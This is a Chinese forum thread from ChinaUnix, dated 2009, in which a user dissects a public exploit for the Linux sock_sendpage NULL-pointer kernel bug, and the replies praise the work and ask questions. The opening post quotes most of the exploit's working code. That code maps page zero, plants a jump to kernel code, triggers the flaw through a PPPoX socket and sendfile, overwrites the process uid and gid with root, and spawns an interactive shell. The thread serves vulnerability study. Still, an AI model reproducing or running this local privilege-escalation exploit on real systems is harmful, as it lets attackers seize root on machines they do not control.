免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 41358 | 回复: 86

新爆内核高危漏洞sock_sendpage的利用分析的讨论 [复制链接]

论坛徽章:
0
发表于 2009-08-18 17:37 |显示全部楼层
先发点上砖上来引玉,大家一起讨论一下吧。

http://linux.chinaunix.net/bbs/thread-1130262-1-1.html

详细地描述了这个漏洞。

具体漏洞原因在

http://archives.neohapsis.com/ar ... e/2009-08/0174.html

也有描述。


因为sock_sendpage没有做指针检查,有些模块不具备sendpage功能,初始时赋为NULL,这样,没有做检查的sock_sendpage有可能直接调用空指针而导致出错——重新映射地址0,并提升权限!!!!


  1. ssize_t sock_sendpage(struct file *file, struct page *page,
  2.                       int offset, size_t size, loff_t *ppos, int more)
  3. {
  4.         struct socket *sock;
  5.         int flags;

  6.         sock = SOCKET_I(file->f_dentry->d_inode);

  7.         flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
  8.         if (more)
  9.                 flags |= MSG_MORE;

  10. /*
  11.         没有做类似的指针检查,就直接调用

  12.            if (unlikely(!sock->ops->sendpage))   
  13.                 return -EINVAL;

  14. */

  15.         return sock->ops->sendpage(sock, page, offset, size, flags);
  16. }
复制代码


来看看利用的代码(程序是在安焦上面下载的:
http://www.securityfocus.com/dat ... xploits/36038-4.tgz):

  1. int main(void) {
  2. char template[] = "/tmp/padlina.XXXXXX";
  3. int fdin, fdout;
  4. void *page;

  5. //获取当前程序的uid和gid,后面权限提升的时候查找使用
  6. uid = getuid();
  7. gid = getgid();
  8. setresuid(uid, uid, uid);
  9. setresgid(gid, gid, gid);

  10. if ((personality(0xffffffff)) != PER_SVR4) {
  11.   if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
  12.    perror("mmap");
  13.    return -1;
  14.   }
  15. } else {
  16.   if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
  17.    perror("mprotect");
  18.    return -1;
  19.   }
复制代码


程序mmap了地址0x0,接下来

  1. *(char *)0 = '\x90';  (nop)
  2. *(char *)1 = '\xe9';  (jmp)
  3. *(unsigned long *)2 = (unsigned long)&kernel_code - 6;
复制代码


(这个 - 6是什么意思,大家指点一下)
在地址0x0处埋下代码kernel_code 函数,因为0x90 = nop, 0xe9 = jmp
上面代码可表示为在映射的地址0处,执行

  1. nop
  2. jmp kernel_code
复制代码


不过现在还没有执行,因为Bug没有被激活,程序没有运行到地址0处。

然后就是激活该Bug:

  1. if ((fdin = mkstemp(template)) < 0) {
  2.   perror("mkstemp");
  3.   return -1;
  4. }

  5. if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
  6.   perror("socket");
  7.   return -1;
  8. }

  9. unlink(template);
  10. ftruncate(fdin, PAGE_SIZE);
  11. sendfile(fdout, fdin, NULL, PAGE_SIZE);
复制代码


这段代码是漏洞描述上的示例代码。。。。。。

关键是kernel_code:

因为Bug被激活,进程已经进入内核上下文:

  1. void kernel_code()
  2. {
  3. int i;
  4. uint *p = get_current();
复制代码



kernel_code第一步是获取当前进程的进程描述符,get_current是一个内联汇编:

  1. static inline __attribute__((always_inline)) void *get_current()
  2. {
  3. unsigned long curr;
  4. __asm__ __volatile__ (
  5.   "movl %%esp, %%eax ;"
  6.   "andl %1, %%eax ;"
  7.   "movl (%%eax), %0"
  8.   : "=r" (curr)
  9.   : "i" (~8191)
  10. );
  11. return (void *) curr;
  12. }
复制代码


这段代码是现成的,描述进程描述符的资料,例如《ULK3》或《Linux内核设计与实现》上都有其介绍。内核中的原型是:
  1. static inline struct task_struct * get_current(void)
  2. {
  3.         return current_thread_info()->task;
  4. }

  5. /* how to get the thread information struct from C */
  6. static inline struct thread_info *current_thread_info(void)
  7. {
  8.         struct thread_info *ti;
  9.         __asm__("andl %%esp,%0; ":"=r" (ti) : "0" (~(THREAD_SIZE - 1)));
  10.         return ti;
  11. }
复制代码


include/asm-i386/current.h

程序返回的是一个uint *指针,而不是struct task_struct *,我认为有两个理由:
A、这是在应用态而不是内核态,如果使用后者,会比较麻烦;
B、这个程序是超版本的,也就是不仅限于某个内核版本,所以,struct task_struct的结构可能会有很大的变化。

所以,没有办法,只能在整个结构范围之内来查找uid和gid。以我的2.6.12为例:
struct task_struct {
……
           /* process credentials */
        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;
……
}
就是要逐个找到它们,一共是8个字段:
所以,使用uint*指针来指向结构的整个buffer,就可以逐字节的查找。而不是直接使用成员名。(我不知所有历史版本,这些成员的名称是否会变化,这样做不引用成员名,连成员名变化都可以忽略了。)

  1. for (i = 0; i < 1024-13; i++) {
  2.   if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
  3.     p[0] = p[1] = p[2] = p[3] = 0;
  4.    p[4] = p[5] = p[6] = p[7] = 0;
  5.    p = (uint *) ((char *)(p + 8) + sizeof(void *));
  6.    p[0] = p[1] = p[2] = ~0;
  7.    break;
  8.   }
  9.   p++;
  10. }
复制代码


所以这里要做一个循环,就是为了超版本的在整个结构的数据中逐个搜寻,去匹备那8个成员。查找上限是1024 - 13,应该与struct task_struct结构的大小有关。包子TX贴子中说测试程序可能会引起系统出问题,估计就是出在这里了。(猜测,呵呵)

接下来就是查找到进程的uid和gid,然后替换之,这里设为0,即为root!!!以达到提升权限的目的。

exit_kernel();退出内核态,并调用exit_code()函数,运行shell。

  1. static inline __attribute__((always_inline)) void exit_kernel()
  2. {
  3. __asm__ __volatile__ (
  4.   "movl %0, 0x10(%%esp) ;"
  5.   "movl %1, 0x0c(%%esp) ;"
  6.   "movl %2, 0x08(%%esp) ;"
  7.   "movl %3, 0x04(%%esp) ;"
  8.   "movl %4, 0x00(%%esp) ;"
  9.   "iret"
  10.   : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
  11.       "i" (USER_CS), "r" (exit_code)
  12.      );
  13. }
复制代码


  1. void exit_code()
  2. {
  3. if (getuid() != 0) {
  4.   fprintf(stderr, "failed\n");
  5.   exit(-1);
  6. }

  7. execl("/bin/sh", "sh", "-i", NULL);
  8. }
复制代码




这些利用漏洞的人,太强了,PF呀PF,人与人差距太大了,学无止境呀!!!

[ 本帖最后由 独孤九贱 于 2009-8-18 22:52 编辑 ]

评分

参与人数 2可用积分 +36 收起 理由
ruochen + 6 精品文章
scutan + 30 精品文章

查看全部评分

论坛徽章:
36
IT运维版块每日发帖之星
日期:2016-04-10 06:20:00IT运维版块每日发帖之星
日期:2016-04-16 06:20:0015-16赛季CBA联赛之广东
日期:2016-04-16 19:59:32IT运维版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-19 06:20:00每日论坛发贴之星
日期:2016-04-19 06:20:00IT运维版块每日发帖之星
日期:2016-04-25 06:20:00IT运维版块每日发帖之星
日期:2016-05-06 06:20:00IT运维版块每日发帖之星
日期:2016-05-08 06:20:00IT运维版块每日发帖之星
日期:2016-05-13 06:20:00IT运维版块每日发帖之星
日期:2016-05-28 06:20:00每日论坛发贴之星
日期:2016-05-28 06:20:00
发表于 2009-08-18 17:40 |显示全部楼层
九贱兄也很强啊。小弟们很是佩服。。

论坛徽章:
0
发表于 2009-08-18 17:55 |显示全部楼层
感觉九贱兄的学习能力和自我钻研能力超强,而且还经常很无私的将一些成果与大家分享
非常敬仰!

论坛徽章:
2
申猴
日期:2013-12-26 22:11:31天秤座
日期:2014-12-23 10:23:19
发表于 2009-08-18 17:59 |显示全部楼层
好!

论坛徽章:
0
发表于 2009-08-18 22:04 |显示全部楼层
原帖由 platinum 于 2009-8-18 17:55 发表
感觉九贱兄的学习能力和自我钻研能力超强,而且还经常很无私的将一些成果与大家分享
非常敬仰!


大家莫要这样说呀,我也是自己看懂一些,请教别人一些,还有一些不是完全懂.放上来大家讨论学习一下,我也好学透!!!再在回来翻了一个ULK3,发现有地方理解有误,再看看,回头再修改一下.

[ 本帖最后由 独孤九贱 于 2009-8-18 22:08 编辑 ]

论坛徽章:
36
IT运维版块每日发帖之星
日期:2016-04-10 06:20:00IT运维版块每日发帖之星
日期:2016-04-16 06:20:0015-16赛季CBA联赛之广东
日期:2016-04-16 19:59:32IT运维版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-19 06:20:00每日论坛发贴之星
日期:2016-04-19 06:20:00IT运维版块每日发帖之星
日期:2016-04-25 06:20:00IT运维版块每日发帖之星
日期:2016-05-06 06:20:00IT运维版块每日发帖之星
日期:2016-05-08 06:20:00IT运维版块每日发帖之星
日期:2016-05-13 06:20:00IT运维版块每日发帖之星
日期:2016-05-28 06:20:00每日论坛发贴之星
日期:2016-05-28 06:20:00
发表于 2009-08-18 23:07 |显示全部楼层
九贱兄为学和为人的态度都值得我们学习。

论坛徽章:
0
发表于 2009-08-18 23:30 |显示全部楼层

回复 #6 Godbach 的帖子

对于Linux这种溢出技术基本上都很成熟了。那两个内联汇编函数在以前的溢出程序中也是频率出现。基本上就是往上套。
比如:
http://www.7747.net/Soft/200908/15070.html
演示vmsplice溢出代码,可以对比参考学习一下.

我觉得作者漂亮的代码是:
mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)
*(char *)0 = '\x90';  (nop)
*(char *)1 = '\xe9';  (jmp)
*(unsigned long *)2 = (unsigned long)&kernel_code - 6;

也不知是不是他原创的,不过偶以前的确没有见过,孤陋寡闻了。现在学习了,呵呵!!!

[ 本帖最后由 独孤九贱 于 2009-8-18 23:32 编辑 ]

论坛徽章:
36
IT运维版块每日发帖之星
日期:2016-04-10 06:20:00IT运维版块每日发帖之星
日期:2016-04-16 06:20:0015-16赛季CBA联赛之广东
日期:2016-04-16 19:59:32IT运维版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-19 06:20:00每日论坛发贴之星
日期:2016-04-19 06:20:00IT运维版块每日发帖之星
日期:2016-04-25 06:20:00IT运维版块每日发帖之星
日期:2016-05-06 06:20:00IT运维版块每日发帖之星
日期:2016-05-08 06:20:00IT运维版块每日发帖之星
日期:2016-05-13 06:20:00IT运维版块每日发帖之星
日期:2016-05-28 06:20:00每日论坛发贴之星
日期:2016-05-28 06:20:00
发表于 2009-08-18 23:33 |显示全部楼层
直接往0地址空间赋值了

论坛徽章:
0
发表于 2009-08-19 00:01 |显示全部楼层
我有有点不解,想请教一下:
return sock->ops->sendpage(sock, page, offset, size, flags);
没做检测就直接调用了。这时会跳到进程的虚拟地址0的位置执行。

但是我不理解的是:之前他做了一个mmap,这时向0地址写入代码,不会有什么任何问题吗?
不会破坏系统或者进程吗?

论坛徽章:
0
发表于 2009-08-19 00:07 |显示全部楼层
mmap这里我觉得很神奇,相当于让内核执行了用户进程空间的代码。
这样太危险了。
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP